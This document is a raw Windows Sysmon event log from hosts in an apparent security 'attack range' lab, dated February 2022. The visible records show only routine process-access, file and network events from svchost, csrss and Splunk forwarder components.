11:24:46.662{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222754Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:46.662{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222753Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:46.662{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222752Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:46.662{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222751Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:46.662{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222750Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:46.662{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222749Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:46.662{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222748Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:46.662{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222747Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:46.662{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-197E-6216-4905-000000003902}420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222746Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:46.662{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-197E-6216-4905-000000003902}420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222745Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:46.663{4F8D34B0-197E-6216-4905-000000003902}420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222744Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:46.506{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F15804FE9DEFB77A80544FBBB693DF91,SHA256=D1DA52A458EC9535551FDE8C8698933717C16CC5E16DC6B02A879B728C208B4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298939Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:46.445{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D8B30EAC608D53207A85E73B9C577DD,SHA256=E9997D99FD056BE4D0100A8B032304C03D86408DBE4593F125D5B99064CD6B3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222774Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:47.881{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98A3C64B43F5176DC47126D09CEF59E3,SHA256=C152ECB9D5FBEE79E66FA43F23AEE18318F06EABDE3D742C9E60526958E76100,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222773Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:47.881{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B409EFBD2AC7C3638009F84DA5880A58,SHA256=36E86C94E20212A669774964E0D206914CACC40C2EDD0A0884E6E6F648EC5248,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298941Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:45.525{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49573-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298940Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:47.460{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFB355987000123136AE6923F903890A,SHA256=DC5CDF3F2EC6FD3539899323FA1E3DF5998BA5B90606CAF56B384662435ABC76,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222772Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:47.365{4F8D34B0-197F-6216-4A05-000000003902}38523628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222771Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:47.178{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-197F-6216-4A05-000000003902}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222770Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:47.178{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222769Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:47.178{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222768Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:47.178{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222767Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:47.178{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222766Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:47.178{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222765Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:47.178{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222764Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:47.178{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222763Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:47.178{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222762Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:47.178{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222761Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:47.178{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-197F-6216-4A05-000000003902}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222760Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:47.178{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-197F-6216-4A05-000000003902}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program 